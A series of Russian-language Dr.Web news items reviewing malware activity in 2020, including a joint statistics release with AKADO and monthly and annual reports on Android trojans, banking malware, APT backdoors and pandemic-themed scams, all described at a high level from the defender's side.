Dr.Web и АКАДО подвели итоги года |
Москва, 28 января 2021 года.
По данным, полученным c сервера Dr.Web AV-Desk – программного обеспечения, обеспечивающего комплексную защиту, - в 2020 году было выявлено свыше 12 000 попыток проникновения вредоносного ПО на компьютеры абонентов АКАДО.
«Больше половины атак, 65%, приходится на потенциально опасные программы, значительную часть которых составляют различные приложения для майнинга криптовалют. Эти приложения могут быть загружены и запущены без ведома владельца компьютера, например, троянскими программами для добычи криптовалюты в пользу злоумышленников. В 20% случаев пользователей пытались атаковать трояны-дропперы и загрузчики, которые устанавливали вредоносные приложения с сомнительных сайтов. Оставшиеся 15% угроз пришлись на рекламные программы – они распространялись под видом различных приложений», - отметила Евгения Хамракулова, руководитель направления технологических партнерств «Доктор Веб».
Анализ данных по месяцам показывает резкие всплески вредоносной активности в марте и октябре, связанные с началом всеобщей самоизоляции и усилением ограничений. Так, например, при попытках пользователей скачать с сомнительных сайтов программу для видеоконференций Zoom были зафиксированы случаи загрузки рекламных приложений. Пользователям предлагалось установить ненужные и, чаще всего, неоригинальные (опасные) программы.
Наиболее спокойным в плане вредоносной активности выдался июль, так как именно на этот месяц приходится пик отпусков, а школьные каникулы находятся в самом разгаре.
«Проанализировав совместно с партнером, компанией «Доктор Веб», характер и количество интернет-угроз, специалисты в области информационной безопасности АКАДО также рекомендуют скачивать только известные программы с официальных сайтов, не посещать сомнительные интернет-ресурсы, не открывать письма от незнакомых отправителей, особенно, если такие письма содержат ссылки. Как правило, эти ссылки ведут на различные вредоносные сайты. Для комфортной и безопасной работы в интернете мы предлагаем ряд пакетных предложений, в которые уже входят антивирусные программы, в том числе и от одного из лидеров отрасли – компании «Доктор Веб», - добавил директор по продажам услуг и обслуживанию на массовом рынке «АКАДО Телеком» Алексей Лапшин.
«АКАДО Телеком» (www.akado.ru, www.akado-telecom.ru) - одна из ведущих телекоммуникационных корпораций Москвы, первый частный оператор кабельного телевидения столицы. Входит в число ключевых подрядчиков Правительства Москвы, в ТОП интернет- и ТВ-провайдеров столицы.
Транспортная сеть АКАДО – одна из самых крупных в Москве по протяженности.
Компания оказывает широкий спектр цифровых услуг и сервисов. Услугами компании пользуются абоненты-физические лица (в зоне действия сети АКАДО около 3 млн домохозяйств), представители крупного, среднего и малого бизнеса, государственные организации.
http://feedproxy.google.com/~r/drweb/viruses/~3/NcZK-Asv5-s/
|
|
«Доктор Веб»: обзор вирусной активности для мобильных устройств за 2020 год |
29 декабря 2020 года
В 2020 году в числе наиболее распространенных вредоносных программам для ОС Android оказались трояны, с помощью которых злоумышленники получали нелегальный заработок. Среди них - вредоносные приложения, созданные для скачивания и запуска произвольного кода, а также загрузки и установки ПО без ведома пользователей. Наряду с ними вирусописатели активно применяли различные рекламные трояны и вредоносные программы-кликеры, выполняющие загрузку веб-сайтов и автоматические переходы по ссылкам.
Серьезную опасность для пользователей представляли бэкдоры, позволяющие злоумышленникам дистанционно управлять зараженными устройствами, а также трояны, превращающие гаджеты в прокси-серверы, через которые киберпреступники перенаправляли трафик.
Актуальной остается проблема кибершпионажа. За последние 12 месяцев владельцы Android-устройств столкнулись со множеством программ, позволяющих следить за ними и контролировать их действия. Многие из таких приложений не являются вредоносными, но представляют потенциальную опасность, поскольку могут применяться как с разрешения пользователей, так и без их ведома.
Не обошлось и без новых угроз в Google Play - официальном каталоге программ и другого цифрового контента для ОС Android. Он считается наиболее надежным источником приложений и игр для Android-устройств, однако злоумышленникам по-прежнему удается добавлять в него вредоносное и нежелательное ПО. Среди угроз, которые в нем обнаружили специалисты компании «Доктор Веб», было множество рекламных троянов, мошеннических приложений и вредоносных программ, подписывающих пользователей на платные сервисы и загружающих дополнительные компоненты. Кроме того, через Google Play распространялись банковские трояны и программы со встроенными нежелательными рекламными модулями.
В 2020 году для распространения различных вредоносных программ злоумышленники активно эксплуатировали тему пандемии коронавируса. На ее фоне распространялись банковские трояны, трояны-вымогатели, трояны-шпионы, мошенническое ПО и другие угрозы.
В марте вирусные аналитики компании «Доктор Веб обнаружили в каталоге Google Play новый на тот момент многофункциональный троян Android.Circle.1, распространявшийся под видом сборников изображений, астрологических программ, игр, утилит и других полезных приложений. Попадая на Android-устройства, он получал от злоумышленников команды с BeanShell-скриптами, которые затем исполнял. Например, Android.Circle.1 мог показывать рекламу и загружать веб-сайты, на которых имитировал действия пользователей - автоматически переходил по ссылкам и нажимал на рекламные баннеры.
В течение года наши вирусные аналитики обнаружили и другие аналогичные вредоносные приложения, принадлежащие к тому же семейству, что и Android.Circle.1.
В мае специалисты «Доктор Веб» зафиксировали распространение новой версии вредоносной программы Android.FakeApp.176, известной на протяжении нескольких лет. Для привлечения пользователей мошенники выдают ее за известные программы и игры. Очередную модификацию трояна злоумышленники продвигали под видом мобильной версии игры Valorant и рекламировали ее через видеохостинг YouTube.
Единственная функция Android.FakeApp.176 - загрузка веб-сайтов партнерских сервисов, где посетителям предлагается выполнить определенные задания: установить ту или иную игру, приложение или пройти опрос. За каждое успешно выполненное задание участники партнерской схемы получают вознаграждение. В случае с Android.FakeApp.176 мошенничество заключалось в том, что за выполнение заданий троян обещал пользователям доступ к игре, которой еще даже не существовало. В результате жертвы такого обмана не получали ожидаемую награду и лишь помогали вирусописателям заработать.
Уже в декабре компания «Доктор Веб» сообщила о трояне Android.Mixi.44.origin, найденном в приложении для заботы о зрении пользователей Android-устройств. Он незаметно переходил по ссылкам и загружал веб-сайты, которые демонстрировал поверх окон других программ. Кроме того, троян следил, какие приложения устанавливает пользователь, и пытался присвоить каждую установку злоумышленникам, за что те получали вознаграждение от партнерских и рекламных сервисов.
За прошедшие 12 месяцев специалисты «Доктор Веб» выявили множество угроз в каталоге Google Play. Среди них — рекламные трояны Android.HiddenAds, демонстрирующие баннеры поверх окон других приложений, многофункциональные трояны Android.Joker, подписывающие пользователей на дорогостоящие мобильные услуги и выполняющие произвольный код, а также другие вредоносные и нежелательные программы.
Воспользовавшись проблемой пандемии SARS-CoV-2, на протяжении всего года киберпреступники активно распространяли различные вредоносные приложения для ОС Android, выдавая их за полезное ПО.
Например, в марте пользователей атаковал троян-вымогатель Android.Locker.7145. Вирусописатели распространяли его под видом приложения, позволяющего отслеживать статистику заражений коронавирусом. Однако вместо этого он зашифровывал хранящиеся на Android-устройствах файлы и требовал за их восстановление выкуп в размере $250.
В мае был обнаружен троян-шпион Android.Spy.660.origin, главной целью которого были пользователи из Узбекистана. В отличие от Android.Locker.7145, он скрывался в программе, которая действительно предоставляла статистику по числу заболевших коронавирусом людей. Однако наряду с этой функцией Android.Spy.660.origin также собирал и передавал на удаленный сервер СМС-сообщения, журнал телефонных вызовов и список контактов из записной книги.
Другая «ковидная» вредоносная программа-шпион - Android.Spy.772.origin - атаковала франкоязычных пользователей. Злоумышленники распространяли ее через мошеннический веб-сайт, имитирующий французский информационный онлайн-ресурс о коронавирусе. Android.Spy.772.origin скачивался с сайта-подделки под видом приложения, предназначенного для проверки симптомов и выявления возможного заражения.
Однако троян после запуска лишь загружал в своем окне настоящий информационный веб-сайт и начинал следить за жертвой. Он передавал злоумышленникам различную конфиденциальную информацию, в том числе содержимое СМС-сообщений, данные о местоположении, телефонных звонках и контактах из телефонной книги. Кроме того, он мог выполнять прослушивание, записывая окружение через встроенный в устройство микрофон, а также производить фото- и видеосъемку.
Среди распространявшихся на фоне пандемии вредоносных программ было и множество банковских троянов. Один из них - Android.BankBot.2550 - являлся очередной модификацией многофункционального Android-банкера, известного под именем Anubis. Наши специалисты зафиксировали случаи, когда для его распространения вирусописатели применяли социальные сети, такие как Twitter. Киберпреступники предлагали потенциальным жертвам перейти на созданные ими сайты и установить ту или иную программу, якобы связанную с информацией о коронавирусе. В действительности пользователи загружали на свои устройства вредоносное приложение, которое похищало их деньги и персональную информацию.
Android.BankBot.2550 демонстрировал фишиговые окна для кражи логинов, паролей и сведений о банковских картах, перехватывал СМС-сообщения, мог создавать скриншоты экрана, самостоятельно отключать встроенную в ОС Android защиту Google Play Protect, перехватывать вводимую информацию и выполнять другие вредоносные действия.
Кроме того, «ковидные» банковские трояны распространялись и под видом приложений, с помощью которых пользователи якобы могли получить материальную поддержку от государства. В условиях пандемии и связанной с ней непростой экономической обстановки правительства многих стран действительно выделяли средства для поддержки населения, чем и воспользовались злоумышленники. Например, под видом приложений для получения социальной помощи распространялись банкеры Android.BankBot.684.origin и Android.BankBot.687.origin, атаковавшие жителей Турции. Они также загружались на Android-устройства жертв с вредоносных веб-сайтов.
Эти трояны пытались похитить логины и пароли от учетных записей мобильного банкинга, показывая фишинговые окна поверх банковских приложений. Кроме того, они могли красть данные о банковских картах, перехватывать и отправлять СМС-сообщения, выполнять USSD-запросы, блокировать экран зараженного устройства и выполнять другие действия по команде киберпреступников.
Тему социальных выплат в период пандемии эксплуатировали и более заурядные мошенники. В частности, они активно распространяли различные модификации вредоносных программ семейства Android.FakeApp. В течение 2020 года специалисты компании «Доктор Веб» выявили множество таких троянов в каталоге Google Play. Чаще всего злоумышленники выдавали их за программы-справочники с информацией о получении пособий, различных денежных компенсаций и возврате НДС. Многие из этих троянов предназначались для пользователей из России, где государство тоже оказало поддержку населению. Пытаясь найти информацию о выплатах, жертвы мошенников устанавливали себе троянов.
Такие вредоносные приложения загружали мошеннические веб-сайты, на которых предлагалось указать персональные данные — якобы для проверки доступности той или иной компенсации или выплаты. После их ввода имитировался поиск по «базе», и пользователям предлагалось указать данные банковской карты для оплаты комиссии за «перевод» денег на их счет или же оплаты пошлины за «оформление» документов. На самом деле никаких выплат и компенсаций жертвы не получали. Они просто лишались денег и передавали злоумышленникам свои конфиденциальные данные.
Согласно статистике детектирований антивирусных продуктов Dr.Web для Android, в 2020 году на Android-устройствах чаще всего обнаруживались различные вредоносные программы. На их долю пришлось 80,72% всех выявленных угроз. Вторыми по распространенности стали рекламные приложения с долей в 15,38%. На третьем месте расположились потенциально опасные программы - они обнаруживались на защищаемых устройствах в 3,46% случаев. Реже всего пользователи сталкивались с нежелательным ПО - на его долю пришлось 0,44% детектирований.
Среди вредоносных приложений преобладали трояны, способные скачивать и выполнять произвольный код, а также загружать и устанавливать другие программы. На их долю пришлось свыше 50% от обнаруженного на Android-устройствах вредоносного ПО. Наиболее распространенными среди них были представители семейств Android.RemoteCode, Android.Triada, Android.DownLoader и Android.Xiny.
Кроме того, в числе самых активных оказались трояны, показывающие нежелательную рекламу. Они составили почти четверть всех выявленных вредоносных приложений. Среди таких троянов были многочисленные представители семейств Android.HiddenAds и Android.MobiDash.
Среди наиболее распространенных нежелательных программ оказались приложения, которые сообщали о несуществующих угрозах и предлагали «вылечить» Android-устройства, купив полную версию этих программ. Кроме того, часто выявлялись различные шпионские приложения.
Среди потенциально опасного ПО наиболее распространенными стали программы, способные запускать другое приложения без их установки. Кроме того, антивирусные продукты Dr.Web для Android обнаружили на Android-устройствах множество программ, защищенных специальными упаковщиками и обфускаторами. Такие утилиты часто используют вирусописатели, чтобы защитить вредоносное и нежелательное ПО от обнаружения антивирусами.
Среди рекламного ПО наибольшее распространение получили программные модули, которые демонстрировали рекламу в панели уведомлений Android-устройств, а также показывали баннеры поверх окон других программ и интерфейса операционной системы.
В 2020 году интенсивность атак с применением банковских троянов сохранялась примерно на одном уровне на протяжении первых трех кварталов. В этом временном промежутке лишь весной произошел определенный всплеск их активности, который совпал с началом пандемии.
С наступлением осени и приходом второй волны коронавируса наблюдался значительный рост детектирований этих вредоносных приложений, продолжившийся до конца года. При этом пик распространения банковских троянов пришелся на сентябрь. Это объясняется тем, что в августе в открытый доступ попал исходный код банкера Cerberus, что привело к появлению множества новых вредоносных программ, созданных на его основе. Различные модификации этого трояна детектируются антивирусными продуктами Dr.Web для Android как представители семейства Android.BankBot.
Банкеры попадали на Android-устройства различными способами. В том числе – путем загрузки с вредоносных сайтов. Наряду с отмеченными ранее мошенническими веб-ресурсами с информацией о коронавирусе злоумышленники создавали множество других поддельных сайтов. Например, распространявшийся в мае среди вьетнамских пользователей троян Android.Banker.388.origin скачивался на устройства при посещении поддельного сайта Министерства общественной безопасности.
А киберпреступники, атаковавшие японских пользователей, на протяжении всего года создавали поддельные сайты почтовых сервисов и курьерских компаний, при посещении которых происходила загрузка Android-банкеров.
Другой вектор их распространения — через каталог Google Play. Например, в июне вирусные аналитики компании «Доктор Веб» обнаружили там сразу нескольких банковских троянов. Одним из них был Android.BankBot.3260, которого киберпреступники выдавали за приложение для заметок. Другой — Android.BankBot.733.origin — распространялся под видом программы для установки системных обновлений и программ, а также защиты от угроз.
А в июле был найден троян Android.Banker.3259, скрывавшийся в приложении для управления телефонными звонками и СМС.
Киберпреступники непрерывно ищут способы защиты вредоносных приложений. В 2021 году можно ожидать появления большего числа многокомпонентных угроз, а также троянов, защищенных различными упаковщиками, затрудняющими обнаружение антивирусами.
Вирусописатели продолжат использовать вредоносные приложения для получения нелегального заработка. В результате пользователи столкнутся с новыми рекламными троянами, всевозможными загрузчиками ПО и кликерами, применяемыми в различных преступных схемах монетизации.
Останется актуальной проблема кибершпионажа и таргетированных атак. Возможно появление вредоносных приложений, которые будут использовать уязвимости ОС Android для заражения устройств. Для защиты от Android-угроз рекомендуется применять антивирусные средства Dr.Web для Android, а также устанавливать все актуальные обновления операционной системы и используемых программ.
http://feedproxy.google.com/~r/drweb/viruses/~3/tkuX_qGn1h0/
|
|
«Доктор Веб»: обзор вирусной активности за 2020 год |
29 декабря 2020 года
В 2020 году одними из самых распространенных угроз, с которыми массово сталкивались пользователи, стали трояны-дропперы, распространяющие и устанавливающие другое вредоносное ПО, многочисленные рекламные приложения, мешающие нормальной работе устройств, а также различные модификации троянов-загрузчиков, запускающих в инфицированной системе исполняемые файлы с набором вредоносных функций. Кроме того, на протяжении всего года хакерские группировки активно распространяли троянские программы, использующие функциональность популярных утилит для удаленного администрирования. Так, вирусная лаборатория «Доктор Веб» зафиксировала несколько атак с использованием RAT-троянов, которые позволяют злоумышленникам дистанционно управлять зараженными компьютерами и доставлять на них вредоносную нагрузку.
Также в этом году вирусные аналитики «Доктор Веб» расследовали несколько масштабных целевых атак, направленных на корпоративный сектор. В ходе работы были выявлены несколько семейств троянов, которыми были инфицированы компьютеры различных государственных учреждений.
В почтовом трафике самыми активными угрозами оказались банковские трояны, стилеры, различные модификации бэкдоров, написанные на VB.NET, а также вредоносные сценарии, перенаправляющие пользователей на опасные и нежелательные сайты. Кроме того, посредством электронной почты злоумышленники активно распространяли программы, эксплуатирующие уязвимости документов Microsoft Office.
Несмотря на то, что большая часть выявленных угроз представляла опасность для пользователей ОС Windows, владельцы компьютеров под управлением macOS также были в зоне риска. В течение года были обнаружены трояны-шифровальщики и шпионские программы, работающие под управлением macOS, а также руткиты, которые скрывали работающие процессы. Также под видом разнообразных приложений активно распространялись рекламные установщики, которые загружали на компьютеры различную потенциально опасную нагрузку. В большинстве случаев под угрозой находились те пользователи, которые отключали встроенные системы безопасности и загружали приложения из недоверенных источников.
Пользователям мобильных устройств на базе ОС Android угрожали рекламные, шпионские и банковские троянские программы, а также всевозможные загрузчики, которые скачивали другие вредоносные приложения и выполняли произвольный код. Значительная часть вредоносного ПО распространялась через каталог Google Play.
В феврале вирусные аналитики «Доктор Веб» сообщили о компрометации ссылки на скачивание программы для обработки видео и звука VSDC в каталоге популярного сайта CNET. Вместо оригинальной программы посетители сайта загружали измененный установщик с вредоносным содержимым, позволяющим злоумышленникам дистанционно управлять инфицированными компьютерами. Управление было реализовано при помощи компонентов программы TeamViewer и троянской библиотеки семейства BackDoor.TeamViewer, которая устанавливала несанкционированное соединение. При помощи бэкдора злоумышленники могли доставлять на зараженные устройства полезную нагрузку в виде других вредоносных приложений.
В марте специалисты «Доктор Веб» рассказали о компрометации ряда сайтов, созданных на CMS WordPress. JavaScript-сценарий, встроенный в код взломанных страниц, перенаправлял посетителей на фишинговую страницу, где пользователям предлагалось установить важное обновление безопасности для браузера Chrome. Загружаемый файл представлял собой установщик вредоносного ПО, которое позволяло дистанционно управлять инфицированными компьютерами. В этот раз злоумышленники вновь использовали легитимные компоненты TeamViewer и троянскую библиотеку, которая устанавливала соединение и скрывала от пользователей работу программы.
Летом вирусная лаборатория «Доктор Веб» выпустила масштабное исследование вредоносного ПО, применявшегося в APT-атаках на государственные учреждения Казахстана и Киргизии. В рамках расследования аналитики обнаружили ранее неизвестное семейство мультимодульных троянских программ XPath, предназначенных для несанкционированного доступа к компьютерам с последующим выполнением различных вредоносных действий по команде злоумышленников. Представители семейства использовали сложный механизм заражения, при котором работа каждого модуля соответствовала определенной стадии работы вредоносной программы. Кроме того, трояны обладали руткитом для сокрытия сетевой активности и следов присутствия в скомпрометированной системе.
Позже в вирусную лабораторию «Доктор Веб» поступили новые образцы ВПО, обнаруженные на одном из зараженных компьютеров локальной сети госучреждения Киргизии. Самой интересной находкой оказался многокомпонентный троян-бэкдор ShadowPad, который, по нашим данным, может являться эволюцией другого мультимодульного APT-бэкдора — PlugX, ранее также обнаруженного в скомпрометированных сетях пострадавших организаций. Сходствам в коде образцов ShadowPad и PlugX, а также некоторым пересечениям в их сетевой инфраструктуре было посвящено отдельное исследование.
В сентябре компания «Доктор Веб» сообщила о выявлении спам-кампании с элементами социнженерии, нацеленной на ряд предприятий топливно-энергетического комплекса России. Для первичного заражения злоумышленники использовали электронные письма с вредоносными вложениями, при открытии которых устанавливались бэкдоры, позволяющие управлять инфицированными компьютерами. Анализ документов, вредоносных программ, а также использованной инфраструктуры свидетельствует о возможной причастности к этой атаке одной из китайских APT-групп.
В ноябре вирусные аналитики «Доктор Веб» зафиксировали рассылку фишинговых писем корпоративным пользователям. В качестве вредоносной нагрузки письма содержали троянские программы, обеспечивающие скрытую установку и запуск утилиты Remote Utilities, установочные компоненты которой также находились в составе вложения. Чтобы заставить потенциальных жертв открыть вложения, злоумышленники применяли методы социальной инженерии.
Анализ данных статистики Dr.Web показал, что в 2020 году пользователей чаще всего атаковали трояны-дропперы и загрузчики, которые устанавливали другие вредоносные приложения и выполняли произвольный код. Кроме того, пользователям по-прежнему угрожали трояны и скрипты, выполняющие скрытый майнинг криптовалют.
В почтовом трафике преобладали трояны-банкеры, бэкдоры и вредоносное ПО, использующее уязвимости офисных документов. Кроме того, злоумышленники распространяли скрипты для скрытого майнинга и фишинга, а также перенаправления пользователей на нежелательные и потенциально опасные сайты.
По сравнению с 2019 годом, в 2020 году число запросов на расшифровку файлов от пользователей, пострадавших от шифровальщиков, в антивирусную лабораторию «Доктор Веб» поступило на 18,4% меньше. Динамика регистрации таких запросов в 2020 году показана на графике:
Базы Родительского (Офисного) контроля и веб-антивируса SpIDer Gate в продуктах Dr.Web регулярно пополняются новыми адресами нерекомендуемых и потенциально опасных сайтов. Среди них — мошеннические и фишинговые ресурсы, а также страницы, с которых распространяется вредоносное ПО. Наибольшее число таких ресурсов было зафиксировано в третьем квартале, а наименьшее — во втором. Динамика пополнения баз нерекомендуемых и опасных сайтов в уходящем году показана на диаграмме ниже.
В феврале специалисты компании «Доктор Веб» предупредили пользователей о запуске в социальной сети Instagram масштабной фишинговой кампании, основанной на сообщениях о единовременной выплате всем гражданам Российской Федерации. Злоумышленники подавали информацию в виде отрывков из выпусков новостей, используя подходящие по смыслу фрагменты из настоящих эфиров. При этом в видеоряд были вставлены дополнительные кадры, содержащие инструкции по заполнению форм на фишинговых сайтах, которые маскировались под официальные ресурсы Минэкономразвития России.
В течение 2020 года интернет-аналитиками компании было выявлено множество мошеннических сайтов, маскирующихся под официальные ресурсы государственных организаций. Чаще всего мошенники предлагали получить несуществующую компенсацию или инвестировать в крупные компании.
Для получения обещанных выгод посетителям чаще всего требовалось ввести свои данные, включая данные банковских карт, и предварительно внести оплату. Таким образом, пользователи теряли не только деньги, но и передавали свои персональные данные злоумышленникам.
В 2020 году владельцам Android-устройств угрожали различные вредоносные и нежелательные приложения. Например, пользователи часто сталкивались со всевозможными рекламными троянами, которые показывали надоедливые уведомления и баннеры. Среди них было множество вредоносных программ семейства Android.HiddenAds, распространявшихся в том числе через каталог Google Play. В течение года вирусные аналитики «Доктор Веб» выявили в нем десятки этих троянов, которых загрузили более 3 300 000 пользователей. На долю таких вредоносных приложений пришлось свыше 13% от общего числа угроз, выявленных на Android-устройствах.
Кроме того, в марте вирусные аналитики обнаружили в Google Play многофункционального трояна Android.Circle.1, которой получал команды с BeanShell-скриптами и также мог показывать рекламу. Помимо этого, он мог переходить по ссылкам, загружать веб-сайты и нажимать на размещенные там баннеры. Позднее были найдены и другие вредоносные программы, принадлежащие к этому семейству.
Другой угрозой, с которой часто сталкивались пользователи, стали всевозможные трояны-загрузчики. Среди них были многочисленные представители семейства Android.RemoteCode, скачивающие и выполняющие произвольный код. На их долю пришлось более 14% угроз, выявленных антивирусными продуктами Dr.Web для Android. Кроме того, владельцам Android-устройств угрожали трояны семейств Android.DownLoader и Android.Triada, загружавшие и устанавливавшие другие приложения.
Наряду с троянами-загрузчиками широкое распространение получили потенциально опасные утилиты, позволяющие запускать программы без их установки. Среди них — утилиты Tool.SilentInstaller и Tool.VirtualApk. Вирусописатели активно применяли их для распространения различного ПО, получая вознаграждение от партнерских сервисов.
Для распространения вредоносных и нежелательных приложений злоумышленники активно эксплуатировали тему пандемии коронавируса. Например, они создавали различные мошеннические сайты, на которых жертвам предлагалось установить справочные или медицинские программы, связанные с коронавирусной инфекцией, а также приложения для получения материальной помощи. В действительности с таких сайтов на Android-устройства загружались шпионские программы, различные банковские трояны, трояны-вымогатели и другое вредоносное ПО.
В течение года вирусные аналитики «Доктор Веб» выявили в каталоге Google Play множество вредоносных приложений семейства Android.FakeApp, предназначенных для загрузки мошеннических сайтов. Злоумышленники выдавали этих троянов за справочники с информацией о социальных выплатах и компенсациях. В период пандемии и непростой экономической ситуации пользователей интересовали такие сведения, и на уловку киберпреступников попалось множество владельцев Android-устройств.
Также в 2020 году на Android-устройствах было выявлено множество приложений, позволяющих следить за их владельцами. Они могли применяться для кибершпионажа и собирать широкий спектр персональной информации — переписку, фотографии, документы, список контактов, информацию о местоположении, сведения о контактах, телефонных разговорах и т. д.
Прошедший год продемонстрировал устойчивое распространение не только массового вредоносного ПО, но и APT-угроз, с которыми сталкивались организации по всему миру.
В 2021 году следует ожидать дальнейшего распространения цифрового вымогательства, при этом целевым атакам с использованием троянов-шифровальщиков все чаще будут подвержены частные компании и корпоративный сектор. Этому способствует развитие модели RaaS (Ransomware as a Service — вымогательство как услуга), а также ощутимый для хакерских группировок результат, стимулирующий их преступную деятельность. Возможное сокращение расходов на информационную безопасность также может привести к стремительному росту числа подобных инцидентов.
Пользователям по-прежнему будет угрожать массовое вредоносное программное обеспечение —банковские и рекламные трояны, майнеры и шифровальщики, а также шпионское ПО. Стоит также готовиться к появлению новых мошеннических схем и фишинговых кампаний, с помощью которых злоумышленники будут пытаться завладеть не только деньгами, но и персональными данными.
Владельцы устройств под управлением macOS, Android, Linux и других операционных систем останутся под пристальным вниманием вирусописателей, и вредоносное ПО продолжит свое распространение на эти платформы. Также можно ожидать, что участятся и станут более изощренными атаки на устройства интернета вещей. Можно с уверенностью сказать, что киберпреступники продолжат использовать для своего обогащения любые методы, поэтому пользователям необходимо соблюдать правила информационной безопасности и применять надежные антивирусные средства на всех устройствах.
http://feedproxy.google.com/~r/drweb/viruses/~3/uos3IGZGc5I/
|
|
«Доктор Веб»: обзор вирусной активности в декабре 2020 года |
28 декабря 2020 года
В декабре анализ данных статистики Dr.Web показал уменьшение общего числа обнаруженных угроз на 11.49% по сравнению с ноябрем. Количество уникальных угроз также снизилось — на 24.51%. По общему количеству детектирований лидируют рекламные программы и вредоносные расширения для браузеров. В почтовом трафике на первых позициях находится разнообразное вредоносное ПО, в том числе банковский троян Trojan.SpyBot.699, обфусцированный стилер, написанный на VB.NET, а также программы, использующие уязвимости документов Microsoft Office.
Число обращений пользователей за расшифровкой файлов снизилось на 31.54% по сравнению с ноябрем. Самым распространенным энкодером остается Trojan.Encoder.26996, на долю которого приходится 37.14% всех инцидентов.
Угрозы прошедшего месяца:
Запросов на расшифровку файлов от пользователей, пострадавших от шифровальщиков, в декабре в антивирусную лабораторию «Доктор Веб» поступило на 28.41% меньше, чем в ноябре.
В течение декабря 2020 года в базу нерекомендуемых и вредоносных сайтов было добавлено 105 840 интернет-адресов.
| Ноябрь 2020 | Декабрь 2020 | Динамика |
|---|---|---|
| + 154 606 | + 105 840 | - 31.54% |
Согласно статистике детектирований, полученной антивирусными продуктами Dr.Web для Android, в декабре на защищаемых Android-устройствах было выявлено на 25,34% меньше угроз по сравнению с ноябрем. При этом наиболее часто пользователи сталкивались с рекламными троянами, а также вредоносными приложениями, загружающими другое ПО и выполняющими произвольный код.
Очередная угроза была обнаружена в каталоге Google Play. Это оказался троян Android.Joker.477, который скрывался в приложении с коллекцией изображений. Он подписывал жертв на дорогостоящие мобильные сервисы и мог загружать и выполнять произвольный код.
Кроме того, в декабре пользователей Android-устройств атаковали различные банковские трояны.
Наиболее заметные события, связанные с «мобильной» безопасностью в декабре:
Более подробно о вирусной обстановке для мобильных устройств в декабре читайте в нашем обзоре.
http://feedproxy.google.com/~r/drweb/viruses/~3/eK66PEqwmj4/
|
|
«Доктор Веб»: обзор вирусной активности для мобильных устройств в декабре 2020 года |
28 декабря 2020 года
По сравнению с ноябрем в декабре антивирусные продукты Dr.Web для Android выявили на защищаемых устройствах на 25,34% меньше угроз. Согласно полученной статистике, количество обнаруженных вредоносных программ сократилось на 25,35%, нежелательных - на 21%, потенциально опасных - на 68,1%, а рекламных - на 25,01%. Чаще всего пользователи Android-устройств сталкивались с рекламными троянами, вредоносными приложениями, способными выполнять произвольный код, а также различными троянами-загрузчиками.
В середине месяца вирусные аналитики копании «Доктор Веб» обнаружили в каталоге Google Play многофункционального трояна Android.Joker.477, который распространялся под видом программы с коллекцией изображений. Кроме того, были зафиксированы очередные атаки с использованием банковских троянов, в частности - Android.BankBot.684.origin и Android.BankBot.687.origin. В ряде случаев злоумышленники выдавали их за программы, позволяющие получить финансовую помощь от государства в период пандемии.
Программные модули, встраиваемые в Android-приложения и предназначенные для показа навязчивой рекламы на мобильных устройствах. В зависимости от семейства и модификации они могут демонстрировать рекламу в полноэкранном режиме, блокируя окна других приложений, выводить различные уведомления, создавать ярлыки и загружать веб-сайты.
В декабре вирусные аналитики компании «Доктор Веб» выявили в каталоге Google Play очередного трояна. Это был представитель семейства Android.Joker, получивший имя Android.Joker.477. Троян распространялся под видом сборника изображений, но в действительности предназначался для подписки пользователей на платные услуги, а также загрузки и выполнения произвольного кода.
Среди троянских программ, угрожавших пользователям в прошедшем месяце, были банкеры Android.BankBot.684.origin и Android.BankBot.687.origin. Новые модификации этих вредоносных приложений, обнаруженные нашими специалистами, атаковали жителей Турции. Трояны распространялись через мошеннические сайты, на которых потенциальным жертвам предлагалось получить материальную помощь от государства в связи с пандемией. Для этого пользователи должны были загрузить и установить специализиронванное ПО, которое на самом деле являлось вредоносным.
Попадая на Android-устройства, банкеры запрашивали доступ к специальным возможностям (Accessibility Service) ОС Android для расширения своих полномочий, скрывали свои значки из списка установленных приложений на главном экране и приступали к выполнению основных функций. Они похищали конфиденциальную информацию, демонстрируя фишинговые окна поверх окон других приложений, перехватывали СМС, могли блокировать экран, а также выполняли другие вредоносные действия.
Для защиты Android-устройств от вредоносных и нежелательных программ пользователям следует установить антивирусные продукты Dr.Web для Android.
http://feedproxy.google.com/~r/drweb/viruses/~3/__snga1iE7g/
|
|
«Доктор Веб»: обзор вирусной активности для мобильных устройств в ноябре 2020 года |
16 декабря 2020 года
В ноябре антивирусные продукты Dr.Web для Android выявили на защищаемых устройствах на 5,14% меньше угроз по сравнению с октябрем. Согласно статистике детектирований, число обнаруженных вредоносных программ снизилось на 8,37%. В то же время число нежелательных, потенциально опасных и рекламных программ, наоборот, увеличилось на 5,78%, 13,16% и 5,72% соответственно.
Среди угроз, выявленных в каталоге Google Play вирусными аналитиками «Доктор Веб», оказался троян Android.Mixi.44.origin. Он загружал и показывал сайты поверх окон других приложений, незаметно переходил по ссылкам и позволял злоумышленникам зарабатывать на том, что пользователи устанавливали то или иное ПО.
Кроме того, наши специалисты обнаружили несколько новых представителей семейства троянов Android.Joker. Их основные функции - загрузка и выполнение произвольного кода, перехват содержимого поступающих уведомлений и подписка на платные сервисы без согласия владельцев Android-устройств.
В середине ноября вирусные аналитики компании «Доктор Веб» выявили в Google Play трояна Android.Mixi.44.origin, который был встроен в приложение для заботы о зрении пользователей Android-устройств. Оно действительно выполняло заявленную функцию, но также имело и скрытые возможности.
Так, Android.Mixi.44.origin загружал веб-сайты и демонстрировал их поверх окон других приложений и интерфейса операционной системы, мешая нормальной работе с устройством. Содержимое этих сайтов могло быть любым: от рекламных баннеров и видеороликов до фишинговых страниц.
Другой функцией трояна был незаметный переход по ссылкам. Android.Mixi.44.origin получал от злоумышленников список веб-адресов, которые ему необходимо было посетить. Таким образом вредоносная программа искусственно увеличивала популярность сайтов, за что ее авторы получали вознаграждение.
Кроме того, троян пытался заработать на недавно выполненных установках программ. Для этого он отслеживал, какие приложения устанавливает и удаляет пользователь. Если получаемые в командах ссылки вели на страницы приложений в Google Play, Android.Mixi.44.origin проверял, были ли эти приложения уже установлены ранее. Если да, троян передавал в сервис аналитики информацию об именах пакетов этих программ вместе с реферал-идентификатором злоумышленников. Тем самым он пытался присвоить установки мошенникам, к которым те не имели никакого отношения.
Если же такие программы еще не устанавливались, троян запоминал их и ожидал момента, когда пользователь их установит, после чего аналогичным образом пытался обмануть сервис.
Подробнее об Android.Mixi.44.origin рассказано в соответствующем новостном материале на сайте компании «Доктор Веб».
